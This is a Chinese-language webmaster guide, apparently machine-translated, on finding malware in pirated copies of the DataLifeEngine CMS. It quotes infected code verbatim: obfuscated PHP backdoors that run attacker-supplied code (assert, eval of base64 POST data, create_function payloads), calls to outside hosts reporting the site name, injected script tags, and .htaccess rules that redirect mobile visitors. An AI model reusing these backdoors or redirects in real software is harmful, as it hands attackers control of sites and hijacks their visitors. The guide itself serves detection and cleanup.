如果发现DataLifeEngine (DLE) 系统中的病毒木马,如何处理它们

献给盗版免费版 DLE的粉丝。
在第三方资源上下载 CMS DLE 时,请准备好木马已经存在于您的系统中,等待您创建项目并访问它(充其量)。在最坏的情况下,他要么删除所有内容,要么秘密重定向到其他站点(通常是 DLE 上站点的移动重定向,因为管理员在 90% 的情况下都不会检测到这种情况,因为他自己坐在 PC 或平板电脑上)。

那么,如何理解您的 DLE 系统中存在带有移动版重定向的病毒?!
选项之一 – 你开始失去出勤率。一旦您注意到这一点,我们建议您注意以下检测恶意代码的说明,以排除网站被黑客入侵或感染的可能性。

另一种选择是当搜索引擎本身通知您您的网站上有不需要的代码时。

我们想提请您注意,恶意代码几乎可以存在于所有类型的引擎文件中,.php、.js、.lng、.htaccess 甚至图像(通常是用户头像)。这样的代码可以是任何形式,可以使用base64_encode加密,使用char以及各种难以通过自动搜索快速检测到的技巧。或者公开(极少数情况)可能是平庸的。

请注意,通常很难清除文件(不知道引擎代码中有什么不合适或多余的地方)。最好使用程序进行代码比较,例如,如果您仍然下定决心并从DLE开发人员那里购买了许可证,则可以使用Beyond的包检查来检查引擎的许可版本的代码和您的代码比较程序。这样你就可以找到代码的不同之处,找到你的病毒。
当然,这只有在您没有使用第三方模块或使用插件修改引擎时才会有所帮助。如果恶意代码在用户头像中,它肯定无济于事。
在当前版本的 DLE 中,头像加载漏洞已得到修复,但 DLE 9.8 之前的版本具有该漏洞。

要查找木马用户头像,请在您的服务器上安装 Virusdie 防病毒软件,它会找到不是它们的图像。

如果您已收到通知或您自己注意到您的网站需要很长时间才能加载、重定向到某个地方,或者防病毒/搜索引擎开始对您的资源发誓,对于初学者来说,只需转到您的主机并查看文件修改日期. 如果您注意到文件最近发生了变化,通常是 /index.php、/engine/data/dbconfig.php、/engine/data/config.php、/.htaccess、/language/Russian/website.lng,其中原则上,它们不应该改变,或者它们只有在您更新或安装某些东西时才会改变,那么我们很有可能会取悦您 – 该网站已被感染。

也不要忘记该站点可能需要很长时间才能加载,因为您的主机很弱,模板中塞满了脚本并且没有优化,以及许多类似的原因。但最好是安全的,不是吗?!

从第三方网站下载的大多数引擎中的恶意代码

我们建议您搜索不是完全巧合,而是部分巧合。
1.engine /inc/addnews.php – 存在恶意代码

$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false)) 
 {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."13."."1_".$serv;};

 

$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

2. engine/classes/antivirus.class.php – 排除不应该存在的文件,事实证明,这个文件是一个漏洞

"./engine/classes/min/lib/JSMinify.php",

 

"./engine/ajax/js.php",

3. engine/classes/min/.htaccess – 异常的存在为有漏洞的文件打开了道路

<Files "JSMinify.php">
 Order Deny,Allow
 Allow from all
</files>
<Files "JSMin.php">
 Order Deny,Allow
 Allow from all
</files>

4. engine/classes/min/lib/JSMinify.php – 不包含在系统分发中且不属于附加组件的恶意文件

5. engine/modules/calendar.php – 存在恶意代码

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

 

$recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';

 

$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}

6.engine /modules/feedback.php – 存在恶意代码

$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

 

$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false)) 
   {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTEzLjFf').$sert);}

 

$captchascrypt='bas'.'e64_'.'dec'.'ode';

 

$home_url = $_SERVER['HTT'.'P_H'.'OST'];
			if ((!strpos($home_url, '127.'.'0.')) and (strpos($home_url, '.'))) 
			{$captis = 'f'.'ile';@$captis($captchascrypt('aHR0cHM6Ly9kbGUtaW5mby5jYy9qcy5waHA/bGljZW5zZT0xNS4xX25f').$home_url);}

7.engine /modules/functions.php – 存在恶意代码

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

 

$news_num = @$_REQUEST['numer'];

 

$bannermass = @$_REQUEST['bannerid'];

 

$check_newsnum = @$_REQUEST['newsnum'];

 

$check_category = @$_REQUEST['category'];

 

$get_url_var = '77067560';

 

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils

 

if($bannermass==$get_url_var){
   if (@strpos($check_newsnum, 'creat')=== false){
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes($check_category) => 2), @$check_newsnum);}else{
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes('}'.$check_category.'//') => 2), @$check_newsnum);}}//chekings

8.engine /ajax/js.php – 恶意文件,应该被删除

恶意代码,可以是可选的(在黑客攻击的情况下)

1.engine /data/dbconfig.php

$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eNqlVG1v2jAQ/itFQnWiskAhvBVF21qhrdq0bpSumlpkOcmReJA4s51SNPPfdw5oXSvKl32Iz76753zP+XL1UEJAKDnyCFWgrFRc5NXZLjwmIz53uFKgnTq9uLr6dDm+qyNq5rq/36E2EmLBwbGqxnOHk9OG5hk47smgO+z2G6RJ3NEGo70IFARk2Pb7Lb/fJ66Qr1g7/cFB6/CQddAie9IlPX/YbvmDbq8z7Pq4DIadVnfg9/xBZ+iTPdnXJcyDOr0eT76PJ3dKSwkPDgotyqIA6RAuS6oVlL9A4o2zUT0V6iBAK5HSQut06y4Ph5eACYB8AqTAYjTsXEnnLU8ir8i0fbum4qlu2t0igjSqVFHkWZlIYcWbzqrSNs+KCqHTo7Nc8GrLKoD4TFwUxwqEtGekj0KyVSmXkEcixlLKeeVSMMky0CCD+/oC1ishY4ThQcFxKYNTxO1hFPxL6Rg5vYhOUq2Ls6alYWuJK7q77ggeuR5t6qVKDpc3h4RRCar8jyLblq39RZCP0+lXeoMn+v7D+MuUzLaN96oZu7DqzVohIaEZ01HqkCayXIK57VxQM15qdpmb2wS0CRmPSxNhAQxnlMkoNSwVwvAkY+YHO5diZVgew6MRIsEAodDmHL+CYx8YloWoyxhfek1OGrY8LjY+Enh2t1h4sjQPCy8S2zDeNqa3he7iSFNqL1xvrxZxLhYmU7kXGZXxtpFh5JlyKRIzZxGEwjMKqnTXNl/PhDxPtklgf1QpPM/hZzsDs85CznKTx1Lw2GQ8LgxIDur+qNcyCq1CmVRH1IiQW2I856bwQiyCwvSKVOTwxBMpOLUXk4rES6AlOlOcZLP9PrtpZk1PrzgZf7sZX0/pzeSSzGrBkf3990yQ3fDp7xsWm83mD0qjwnU=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');

破译此代码后,您可以看到以下内容:

$bre = '_' . '_ses' . 'sion' . '_' . 'id';
if (isset($_COOKIE[$bre])) {
    @setcookie($bre, $_COOKIE[$bre] + 1, time() + 85957, '/');
}
if (($_COOKIE[$bre] == '92470477') or ($_COOKIE[$bre] == '92470378') or ($_COOKIE[$bre] == '92470379') or ($_COOKIE[$bre] == '92470380')) {
    @setcookie($bre, '64920485639546398930584648394', time() + 85957, '/');
    $ref = $_SERVER[strrev(strtoupper('iru_tseuqer')) ];
    $hos = $_SERVER[strrev(strtoupper('tsoh_ptth')) ];
    $rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
    header(strrev('3?igc.pmt' . '/siht/' . 'kcehc' . '/cc.' . 'gro' . '-3w' . '//:pt' . 'th :noi' . 'tac' . 'oL') . '&seor' . 'ef=' . rawurlencode($rf) . '&parameter=\$keyword&se=\$se&ur=1' . strrev(strtoupper('=rerefer_ptth&')) . rawurlencode('http://' . $hos . $ref));
    exit;
}
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth')) ];
$rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
if ((!$_SERVER['HTTP_USER_AGENT']) or ($_SERVER['HTTP_USER_AGENT'] == '') or (!preg_match('/rawle|W3C_|EltaIn|Wget|baidu|curl|ia_arch|ahoo|igma|YaBrow|andex|oogle|bot|Bot|pider|amble|mail./i', $usg))) {
    if (preg_match('/ok.ru|vk.co|oogle.|andex.|mail.r|ambler|ut.by|igma|odnok|msn.c|smi2|rbc.|ulog|facebo.|search|yahoo.|bing./i', $rf)) {
        if ((preg_match('/j2me|ymbian|ndroid|midp|eries\ 60|symbos|htc_|obile|mini|p.browser|phone/i', $usg)) and (!isset($_COOKIE['dle_user_id'])) and (!isset($_COOKIE[$bre])) and ($_SERVER['REQUEST_URI'] != '/')) {
            @setcookie($bre, '92470377', time() + 85957, '/');
        }
    }
}

从这段代码中,您可以看到它只在移动设备上工作,并且只工作一次,然后它被写入用户的 cookie 中并且不会重新显示。因此,许多人可能认为这是一个小故障。好吧,脚本本身会将移动设备用户重定向到 w3-org.cc 网站。反过来,攻击者将其用作放置站点并将用户重定向到任何其他终端地址。

2.index.php _

if(preg_match('/'.'('.'a'.'n'.'d'.'r'.'o'.'i'.'d'.'|'.'m'.'i'.'d'.'p'.'|'.'j'.'2'.'m'.'e'.'|'.'s'.'y'.'m'.'b'.'i'.'a'.'n'.'|'.'s'.'e'.'r'.'i'.'e'.'s'.' '.'6'.'0'.'|'.'s'.'y'.'m'.'b'.'o'.'s'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'m'.'o'.'b'.'i'.'l'.'e'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'c'.'e'.'|'.'p'.'p'.'c'.'|'.'s'.'m'.'a'.'r'.'t'.'p'.'h'.'o'.'n'.'e'.'|'.'b'.'l'.'a'.'c'.'k'.'b'.'e'.'r'.'r'.'y'.'|'.'m'.'t'.'k'.'|'.'b'.'a'.'d'.'a'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'p'.'h'.'o'.'n'.'e'.')'.'/'.'i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m"] != '5df9974cf25d22eb3c5aa962d6460477')
{
@setcookie('m', '5df9974cf25d22eb3c5aa962d6460477', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."p"."i"."d"."d"."."."b"."o"."t"."."."n"."u"."/"."s"."/"."1"."1"."8"."0"."5");
die();
}

4. index.php , engine/modules/config.php , engine/modules/dbconfig.php

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yadirect.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

5.engine /data/dbconfig.php

$config['description'].='" />'."
".'<script type="text/javascript" src="http://up.bot.nu/go/'.rand(0,999).'"></script>'."
".'<meta http-equiv="Pragma" content="no-cache';

6.根目录下的.htaccess

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gsa-crawler|grub-client|gulper|slurp|mihalism|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://stat.pdaupd.net/?23&source=ваш домен [L,R=302] # on

 

RewriteCond %{QUERY_STRING} (^|&)noredirect=true(&|$)
RewriteRule ^ - [CO=mredir:0:%{HTTP_HOST},S]
RewriteCond %{HTTP:x-wap-profile} !^$ [OR]
RewriteCond %{HTTP:Profile}       !^$
RewriteCond %{HTTP_HOST}          !^m\.
RewriteCond %{HTTP:Cookie}        !\smredir=0(;|$)
RewriteRule ^ http://yadirect.ws/ [R,L]

要检查系统中所有文件的病毒清除情况,您需要使用任何操作系统(ios、android 等)的移动设备访问您的站点,如果没有重定向到第三方资源攻击者,那么一切都很好。

经常被重定向到 DLE 移动版本的站点:

w3-org.cc
statuses.ws live-internet.ws getinternet.ws
livecountall.ws
googlecount.ws回顾一下

 


始终使用引擎的许可副本并密切关注该站点。

如果您已经发现了某种错误,但它没有帮助,您可以向您的技术人员寻求帮助以解决问题。北方还是给我们的支持,是有偿开发的。

 

订阅评论
提醒
guest

0 评论
内联反馈
查看所有评论
阅读7次
0
希望看到您的想法,请您发表评论x